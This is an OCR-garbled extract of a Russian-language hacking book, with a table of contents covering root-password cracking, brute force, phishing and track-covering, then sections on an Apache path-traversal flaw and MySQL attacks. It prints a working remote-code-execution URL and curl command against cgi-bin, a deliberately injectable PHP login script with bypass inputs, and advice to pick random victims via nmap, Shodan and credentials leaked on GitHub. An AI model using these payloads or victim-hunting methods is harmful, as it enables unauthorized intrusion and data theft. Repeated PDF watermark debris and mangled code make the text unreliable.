- •ВВЕДЕНИЕ
- •ГЛАВА 1. ОСНОВЫ LINUX
- •1.1. ПРОЦЕСС ЗАГРУЗКИ ОС. ЯДРО
- •1.1.1. Загрузчики Linux
- •1.1.2. Загрузчик GRUB2
- •Конфигурационные файлы
- •Выбор метки по умолчанию
- •Пароль загрузчика GRUB2
- •Установка загрузчика
- •1.1.3. Система инициализации
- •Принцип работы
- •Цели
- •Управление сервисами при использовании systemd
- •1.2. УЧЕТНЫЕ ЗАПИСИ ПОЛЬЗОВАТЕЛЕЙ
- •1.2.1. Введение в учетные записи Linux
- •1.2.2. Получение полномочий root
- •1.2.3. Управление учетными записями пользователей
- •Файлы /etc/passwd и /etc/shadow
- •Группы пользователей
- •1.2.4. Модули РАМ
- •Ограничиваем время входа в систему
- •Ограничение системных ресурсов с помощью РАМ
- •1.3. ПРАВА ДОСТУПА К ФАЙЛАМ И КАТАЛОГАМ
- •1.3.1. Общие положения
- •1.3.2. Смена владельца файла
- •1.3.3. Определение прав доступа
- •1.3.4. Специальные права доступа
- •1.3.5. Атрибуты файла
- •1.4. МОНТИРОВАНИЕ ФАЙЛОВЫХ СИСТЕМ
- •1.4.1. Монтируем файловые системы вручную
- •1.4.2. Имена устройств
- •1.4.3. Монтируем файловые системы при загрузке
- •1.4.4. Автоматическое монтирование файловых систем
- •1.4.5. Работа с журналом
- •1.4.6. Преимущества файловой системы ext4
- •Создание файла подкачки
- •Файлы с файловой системой
- •ГЛАВА 2. ЛОКАЛЬНЫЙ ВЗЛОМ - ЛОМАЕМ ПАРОЛЬ ROOT
- •2.1. ИСПОЛЬЗУЕМ ПОДМЕНУ ОБОЛОЧКИ
- •2.2. ИСПОЛЬЗУЕМ ЗАГРУЗОЧНЫЙ ДИСК
- •ГЛАВА 3. ПОЛУЧАЕМ ПРАВА ROOT НА VDS
- •3.1. СБОР ИНФОРМАЦИИ
- •3.2. КРИТИЧЕСКИЕ ДАННЫЕ
- •3.3. ФЛАГИ SUID/SGUID
- •3.4. АНАЛИЗ ИСТОРИИ КОМАНД
- •3.5. ВОЗМОЖНОСТИ LINUX
- •3.6. ПЛАНИРОВЩИК CRON
- •3.8. БРУТФОРС SSH
- •3.8.1. Использование Patator
- •3.8.2. Инструмент Hydra
- •3.8.3. Инструмент Medusa
- •3.8.4. Metasploit
- •ГЛАВА 4. УЯЗВИМОСТИ ECRYPTFS
- •4.1. ВЫБОР СРЕДСТВ ШИФРОВАНИЯ В LINUX
- •4.2. АТАКА НА ECRYPTFS: ПОЛУЧАЕМ ПРИВИЛЕГИИ ROOT
- •ГЛАВА 5. ВЗЛОМ ПОПУЛЯРНЫХ СЕТЕВЫХ СЕРВИСОВ
- •5.1. УЯЗВИМОСТЬ В APACHE
- •5.1.1. Общее описание уязвимости
- •Пример 2
- •5.2. ВЗЛОМ MYSQL
- •5.2.1. SQL-инъекции
- •5.2.2. Поиск жертвы
- •5.2.3. Брутфорс
- •5.2.4. Что делать дальше?
- •5.3. ВЗЛОМ WORDPRESS
- •ГЛАВА 6. СБОР ИНФОРМАЦИИ
- •6.1. ОБЩЕДОСТУПНЫЕ САЙТЫ
- •6.2. ПОЛУЧЕНИЕ ИНФОРМАЦИИ О ДОМЕНЕ
- •6.3. КОМАНДА HOST
- •6.6. КОМАНДА TRACEROUTE
- •ГЛАВА 7. ЧТО ТАКОЕ KALI LINUX И КАК ЕГО ИСПОЛЬЗОВАТЬ ДЛЯ ВЗЛОМА
- •7.1. ВКРАТЦЕ О KALI
- •7.2. ГДЕ СКАЧАТЬ И КАК УСТАНОВИТЬ KALI LINUX
- •7.3. ОБСЛУЖИВАНИЕ СИСТЕМЫ
- •7.3.1. Обслуживание источников пакетов
- •7.3.3. Регулярная очистка системы
- •8.1. WPSCAN
- •8.2. NMAP
- •8.3. LYNIS
- •8.4. AIRCRACK-NG
- •8.5. HYDRA
- •8.6. WIRESHARK
- •8.7. METASPLOIT FRAMEWORK
- •8.8. SKIPFISH
- •8.9. SQLMAP
- •8.10. ВЗЛОМ ПАРОЛЯ WINDOWS. JOHN THE RIPPER
- •8.12. AUTOPSY FORENSIC BROWSER: ПРОФЕССИОНАЛЬНЫЙ ИНСТРУМЕНТ ПРАВООХРАНИТЕЛЬНЫХ ОРГАНОВ
- •8.13. NIKTO
- •8.14. SNORT
- •8.15. AIRFLOOD
- •8.16. APKTOOL
- •8.17. NESSUS - ЛУЧШИЙ СКАНЕР УЯЗВИМОСТЕЙ
- •ГЛАВА 9. ИСПОЛЬЗОВАНИЕ METASPLOIT ДЛЯ ВЗЛОМА
- •9.1. ЧТО ТАКОЕ METASPLOIT
- •9.2. СТРУКТУРА ФРЕЙМВОРКА
- •9.3. БАЗОВАЯ ТЕРМИНОЛОГИЯ
- •9.4. КОНФИГУРАЦИИ ФРЕЙМВОРКА И ОСНОВНЫЕ КОМАНДЫ
- •9.6. ПЕРВЫЙ ЗАПУСК METASPLOIT
- •9.7.9. Команда irb
- •9.8. ПРАКТИЧЕСКИЙ ПРИМЕР 1: ВЗЛАМЫВАЕМ СТАРЕНЬКИЙ СЕРВЕР WINDOWS 2008 С ПОМОЩЬЮ ЭКСПЛОИТА АНБ
- •10.1. КТО И ЗАЧЕМ ВЗЛАМЫВАЕТ АККАУНТЫ
- •10.2. СБОР ИНФОРМАЦИИ
- •10.3. МЕТОДЫ ВЗЛОМА
- •10.3.1. Взлом электронной почты
- •10.3.3. Перебор пароля
- •10.3.4. Фишинг или фейковая страничка. Очень подробное руководство
- •10.3.5. Клавиатурный шпион
- •10.3.6. Подмена DNS
- •10.4. КАК УБЕРЕЧЬСЯ ОТ ВЗЛОМА
- •ГЛАВА 11. АНОНИМНОСТЬ В ИНТЕРНЕТЕ
- •11.1. ЧАСТИЧНАЯ АНОНИМНОСТЬ
- •11.2. ЦЕПОЧКИ ПРОКСИ
- •11.3. ПРОЕКТ TOR
- •Фиксирование входных узлов
- •Исключение подозрительных узлов
- •Запрещаем использовать комп в качестве выходного узла
- •11.4. VPN ДЛЯ LINUX
- •11.5. ЧТО ТАКОЕ DARKNET?
- •11.6. НА ПУТИ К ПОЛНОЙ АНОНИМНОСТИ
- •11.7. ЗАМЕТАЕМ СЛЕДЫ
- •11.7.1. Приложения для безопасного удаления данных с жестких дисков
- •11.7.2. Удаление инфы с SSD
- •11.7.3. Запутываем следы
- •12.1. ПРИБОРЫ И МАТЕРИАЛЫ
- •12.2. ВСКРЫВАЕМ АРК
- •12.3. ВНОСИМ ИЗМЕНЕНИЯ В ПРОГРАММУ
- •12.4. УСТАНОВКА ANDROID STUDIO В LINUX
- •13.1. ВЗЛОМ FTP
- •13.2. ПРОВЕРКА ПОРТОВ
- •13.3. СКАНИРОВАНИЕ MYSQL
- •13.4. ТСР-СЕРВЕР НА PYTHON
- •13.5. КАК ЗАПУСКАТЬ СКРИПТЫ ИЗ ЭТОЙ ГЛАВЫ?
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
Пример4
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Одна из лучших полезных нагрузокследующий URL можно использовать для удаленного выполнения кода в системе, которая работает под управле нием уязвимого Apache:
http://$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
Подобные запросы можно вводить непосредственно в браузер, или же ис пользовать команду curl:
curl --data "A=lecho;id>" 'http://127.0.0.1:8080/cgi bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
5.2. Взлом MySQL
MySQLсамая распространенная СУБД на просторах Интернета. Большин ство сайтов использует именно эту СУБД или один из ее форков, например, MariaDB. В этом разделе мы поговорим о том, как взломать MySQL.
5.2.1. SQL-инъекции
Наверное, все вы слышали про SQL-инъекции- это способ внедрения SQL инъекции в код сайта. Посредством внедренного SQL-кoдa, конечно, если все прошло успешно, возможно украсть данные (например, платежную ин формацию), изменить данные в БД или же полностью уничтожить БД.
Разберемся, как делаются инъекции. Пусть у нас есть таблица users:
create tаЫе users (
- id int(ll) NOT NULL auto_increment,
login varchar(l00), , password varchar(S0),
- - - - - - - - - - -- - -- - - - - - - - - - - - -- - - - - - -- - ----- - -- - - ---- - - --- - - - - --- ------- - - - ---- --__
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
||
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
NOW! |
o |
|
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
|
||||
|
|
|
|
|
|
---------------- -- |
||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
email varchar(l00), |
||||
|
|
|
|
|
|
|
||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
||
|
|
|
df |
|
|
n |
e |
|
|
PRIМARY КЕУ (id_user) |
||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
-xcha |
|
|
|
|
|
|
) ;
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Теперь рассмотрим уязвимый сценарий auth.php:
<?php
// Подключаемся к БД include "connect.php";
// Получаем данные из формы
// Используем метод GET для упрощения передачи SQL
$user $_GET['user']; $pass = $_GET['pass'];
// нашему сценарию посредством формы передается две переменные
// $user и $pass. Далее он делает запрос в БД. Если в таблице users будет // запись, где в поле login будет значение из поля формы user, а поле
//password будет содержать введенный: пароль, то результат будет содержать
//одну строку, в противном О. Если строк О - пользователь не прошел
аутентификацию
$query = "SELECT * FROM users
WHERE login = \"$login\" AND password = \"$pass\""; // выводим для отладки запрос, чтобы вы видели, что происходит echo $query;
$r = $mysqli->query($sql);
if($ri_num_rows > О)
{
echo "<р>аутентификация прошла успешно";
else echo "<p>access denied";
?>
Внимание! Данный сценарий содержит уязвимость, поэтому ни когда не используйте его на практике!
Для передачи данных сценарию auth.php будем использовать форму:
<form action=auth.php method=post>
,_--- ------------------------ ----------------------------- -- ----------------....-1111
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|
||
|
- |
|
|
|
|
|
d |
|
|
|
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
P |
|
|
|
|
|
|
NOW! |
|
o |
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|
|
|
|||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
w Click |
|
|
Loginm |
<input type text narne |
user> |
|||||||||
|
|
|
||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
= |
= |
|
|
|
w |
|
|
|
|
|
|
|
|
|
o |
|
pass> |
|
|
. |
|
f-xchanPass <input type=text narne |
|||||||||||
|
|
|
|
|
|
|
.c |
|
|
|
||||
|
|
p |
d |
|
|
|
|
e |
|
|
= |
|
||
|
|
|
|
|
|
|
g |
|
|
|
|
|
|
<input type=subrnit narne=Login> </forrn>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
в |
user |
укажем в |
вывод |
|
|
SELECT * FROM users WHERE login |
"user" AND password "321" |
|
аутентификация прошла успешно |
|
|
|
|
введем |
SELECT * FROM users WHERE login |
"user"/*" AND password |
"" |
|
||
аутентификация прошла успешно |
|
|
|
ввели |
|
SELECT * FROM users WHERE login = "user"/*" AND password |
"" |
|
SELECT * FROM users WHERE login = "user"
1118 |
• |
---------------------------------------------------------------------------------· |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
|||
|
D |
|
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
r |
|||
P |
|
|
|
|
|
|
NOW! |
o |
|
P |
|
|
|
|
|
NOW! |
o |
|||||||
|
|
|
|
|
|
BUY |
|
1 1,11',.1 .:;_ 1\: 111\1 fllllll 1!1!)111,1\ t"l"ll'l',1,1\ Ll'pBiillll', |
|
BUY |
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||
|
|
Click |
|
|
|
Преждеm |
всего, нужно исследовать исхоДНЪIЙ код страницы с формой входа наClick |
|
|
|
|
|
|
m |
||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
|
o |
|
w |
|
|
|
|
|
|
|
|
o |
|
|||
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|||
w |
|
|
|
|
|
|
|
|
.c |
|
w |
|
|
|
|
|
|
|
.c |
|
||||
|
|
. |
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
|
||||||
|
|
|
p |
|
|
|
|
|
сайт. Как минимум, ты узнаешь следующие вещи: |
|
|
p |
|
|
|
|
g |
|
|
|
||||
|
|
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
•Как называется сценарий аутентификации, и он указывается в action
•Как называются поля, содержащие логин и парольна случай автомати зации ты будешь знать, какие данные нужно отправлять на сервер, чтобы сценарий смог с ними работать.
Надеяться, что кто-то напишет такой же дырявый сценарий, не стоит, но по пытаться можно. Лучше всего SQL-инъеКЦIПI исюrrъ так:
•Определить (просмотрев исходный код НТМL-страницы, выводимой в браузер) тип CMS, которая используется у "жертвы" и ее версию Далее нужно использовать Google или тобой другой поисковик для поиска ин формации о SQL-инъекциях в этой CMS. Если CMS популярная, то ин формация будет.
•А вот если CMS не популярная или само1D1сная, то есть информации в открытых источниках нет, тогда придется разбираться самостоятельно. Также можно попытаться найти (если удалось опознать название и вер сию CMS) ее исходники на том же GitHub. Исследуй исходники и постарайся найти слабые места. Первый вариант проще, второй - нужно как минимум обладать знаниями того языка, на котором написана CMS, и квалификация твоя должна быть выше среднего. Ковыряние в коде
займет некоторое время.
5.2.2. Поиск жертвы
Если тебе все равно кого взломать, то есть нужно потренироваться, нужно первым делом найти случайную жертву. Как правило, MySQL использует порт 3306, поэтому просканируем сканером сеть:
nmap -sV -PN -р 3306 <ip>
• |
|
Можно также сканировать диапазон IP: |
|
·---------------------------------------------------------------------------------- |
1111 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
||
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
P |
|
|
|
|
|
NOW! |
o |
|
|
|||
|
|
|
|
|
|
|
1 illll\ |
|||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
'\,11,11111 11,1 |
|||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
w Click |
|
|
nmapm |
-sv |
-PN -р 3306 <ipl>-<ip2> |
|||||||
|
|
|
||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
||
|
|
|
df |
|
|
n |
e |
|
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Если у тебя нет определенной жертвы, но ты хочешь протестировать на ком то свои навыки, то можешь воспользоваться хакерским поисковиком Shodan. Он позволяет делать поиск по хостам и выводить информацию о различных сервисах на основе баннеров ответов. Также имеет возможность фильтро вать по портам, стране,,городу, операционным системам и так далее. Одна из отличнейших фишек - поиск сервисов с анонимной авторизацией или авторизацией со стандартными кредами.
1 |
WIIO\il• 8"'ond."м,Ulhe\11/eЫ p.tftdthe!nwmttЬ |
.W |
|
.ь--Exposu• |
1 |
l<eeptreckd.К'/Wfde\lkathltaredifectty |
|||
|
Shodentochtь.wewrythlngfrcmpower |
f,om!helr'lteflwt.snodм |
||
|
puRS,IТIOIXeCf'IOr'le5.. n:I |
|
|
• ,,.....dtuf!!ФOИd_...ikes |
mlrls!netintoWgonoo
Lмnmoi,!8tJOUIWl)QI\Vtlf1QVll'IOUt pr Wldnowtf'lly'ttr o,e,-tJ'tV' Snod8'1gм:lyou.1Gltl-<t'\«lnнtdtt.
Рис. 5.1. Сервис Shodan
Также жертву легко найти на GitHub. Причем вместе с исходниками на GitHub легко найти креды, то есть логины и пароли к СУБД. Часто разработ чики забывают удалить их, а ты можешь этим воспользоваться. Введи такой запрос mysql userpassword и ты наверняка найдешь много чего интересного. Как только что-то найдешь, можешь смело коннектиться к базе, все должно получиться.
Также для сбора информации удобно использовать Metasploit. Для этого слу
жит auxiliary/scanner/mysqVmysql _ version, просто сканер версий , который |
|
может сканировать целый пул адресов : |
• |
|
|
---------------------------------------------------------------------------------- |
· |